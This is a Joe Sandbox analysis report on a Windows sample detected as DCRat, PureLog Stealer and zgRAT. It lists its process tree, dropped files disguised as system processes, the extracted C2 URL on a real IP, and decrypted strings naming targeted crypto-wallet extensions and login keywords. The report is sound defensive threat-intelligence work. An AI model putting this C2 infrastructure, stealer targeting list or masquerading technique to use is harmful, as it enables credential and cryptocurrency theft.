Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
85D5ktqjpd.exe

Overview

General Information

Sample name:85D5ktqjpd.exe
renamed because original name is a hash value
Original sample name:97c2927135dd8fce7d56d5e1b2914bfa.exe
Analysis ID:1589407
MD5:97c2927135dd8fce7d56d5e1b2914bfa
SHA1:a6b5eb9800ea4fef6da44d306d743941143d87ea
SHA256:21922a6cc19a72509d69fb830853a1e7e3af5b3e44134da7d1b65c3ee78f6037
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 85D5ktqjpd.exe (PID: 6944 cmdline: "C:\Users\user\Desktop\85D5ktqjpd.exe" MD5: 97C2927135DD8FCE7D56D5E1B2914BFA)
    • cmd.exe (PID: 4960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1720 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 5744 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • ctfmon.exe (PID: 3384 cmdline: "C:\Recovery\ctfmon.exe" MD5: 97C2927135DD8FCE7D56D5E1B2914BFA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
85D5ktqjpd.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    85D5ktqjpd.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: 85D5ktqjpd.exe PID: 6944JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: ctfmon.exe PID: 3384JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.85D5ktqjpd.exe.d70000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.85D5ktqjpd.exe.d70000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\85D5ktqjpd.exe, ProcessId: 6944, TargetFilename: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-12T09:17:22.415092+010020480951A Network Trojan was detected192.168.2.44973191.211.249.4680TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 85D5ktqjpd.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Users\user\Desktop\QitkawpP.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Users\user\Desktop\HpjdguSK.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                            Source: C:\Recovery\ctfmon.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Users\user\Desktop\VWLjDtED.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                            Source: C:\Users\user\Desktop\MdBcJrhy.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                            Found malware configuration
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeReversingLabs: Detection: 83%
                            Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeReversingLabs: Detection: 83%
                            Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeReversingLabs: Detection: 83%
                            Source: C:\Recovery\ctfmon.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\Desktop\CJjejXjo.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\CpWmZfmQ.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\EzsmZyRR.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\ICMDMDoc.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\JVDTnZnD.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\QitkawpP.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\TEXjXBsl.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\WuNaeyse.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\XYySZcJy.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\akEQlvtX.logReversingLabs: Detection: 15%
                            Source: C:\Users\user\Desktop\cLPQBZYm.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\eWmRCrDn.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\fKqanEzl.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\haIyjaMG.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\hyuiZSvj.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\jAgQuBAe.logReversingLabs: Detection: 15%
                            Source: C:\Users\user\Desktop\jswyQSZZ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\oPZxcDoy.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\oYwxMpHv.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\pHpfyUNt.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\rIogOAZx.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\sdoGeuPL.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\xJoFaSxi.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\yWRfHaUA.logReversingLabs: Detection: 25%
                            Multi AV Scanner detection for submitted file
                            Source: 85D5ktqjpd.exeVirustotal: Detection: 62%Perma Link
                            Source: 85D5ktqjpd.exeReversingLabs: Detection: 83%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\Desktop\TEXjXBsl.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\VOtkXUXl.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJoe Sandbox ML: detected
                            Source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\LnsTTQzV.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\CJjejXjo.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\HpjdguSK.logJoe Sandbox ML: detected
                            Source: C:\Recovery\ctfmon.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\HFlvrDZi.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\VWLjDtED.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\ICMDMDoc.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\MdBcJrhy.logJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 85D5ktqjpd.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;minecraft.net;steam.storepowered.com","_1":"mail.google.com;minecraft.net;steam.storepowered.com"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account;password;login;register","_1":"1500","_2":"15","_3":"False"},"75400db8-4680-4af7-97bd-c8a76b65b9c4":{"_0":"bHYLmvnvgOjMnCFjcuPoYNCOvjCVWsqU","_1":"Unsupported","_2":"Incompatible version, run as administrator to allow automatic update","_3":"Error","_4":"OK"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["n0mGv23O2HDyft3GCDNimJZOLdVMrtE1tYUrs5xYPygbzM6mpXxF71udbY5RgqhJDLEGZLXHQySym7Y8gsgU5832n1PT9f2iRXXnI0Nd9qyIi60dA7uyKMNFSLch5DHu","6221a3ce11ad15d7fc6881b7016cb4cb64da46691841946f781729876ccb1b99","0","mined","1","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                            Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://91.211.249.46/3vmApi/8/poll2GeneratorPython/","ImagepipeRequestsecureprocesswpPublic"]]
                            Source: 85D5ktqjpd.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Mozilla Firefox\uninstall\ea1d8f6d871115Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Uninstall Information\72f9cbbcf2062aJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530eJump to behavior
                            Source: 85D5ktqjpd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: ctfmon.exe, 00000005.00000002.2974289113.000000001BE88000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Recovery\ctfmon.PDB^ source: ctfmon.exe, 00000005.00000002.2972545766.000000001B8BF000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9BA6CEBD
                            Source: C:\Recovery\ctfmon.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh5_2_00007FFD9BC8CEBD

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 91.211.249.46:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                            Source: global trafficHTTP traffic detected: POST /3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 91.211.249.46Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.211.249.46
                            Source: unknownHTTP traffic detected: POST /3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 91.211.249.46Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 12 Jan 2025 08:17:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.211.249.46
                            Source: ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.211.249.46/3vmApi/8/poll2GeneratorPython/
                            Source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF3A000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.000000000391F000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000002.2931880992.0000000003571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9B8BEBA00_2_00007FFD9B8BEBA0
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9B8B0D670_2_00007FFD9B8B0D67
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9B8B7D6C0_2_00007FFD9B8B7D6C
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA6005A0_2_00007FFD9BA6005A
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA656A50_2_00007FFD9BA656A5
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BADEBA05_2_00007FFD9BADEBA0
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAD0D675_2_00007FFD9BAD0D67
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAD7D6C5_2_00007FFD9BAD7D6C
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAECBB55_2_00007FFD9BAECBB5
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAEA8D35_2_00007FFD9BAEA8D3
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BC943C85_2_00007FFD9BC943C8
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BC800785_2_00007FFD9BC80078
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C4121835_2_00007FFD9C412183
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CJjejXjo.log B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                            Source: xJoFaSxi.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: uzSEaASh.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: nbVprpsA.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: lQyoqXNz.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: VOtkXUXl.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: TEXjXBsl.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: JVDTnZnD.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: tTxOTVxp.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: haIyjaMG.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
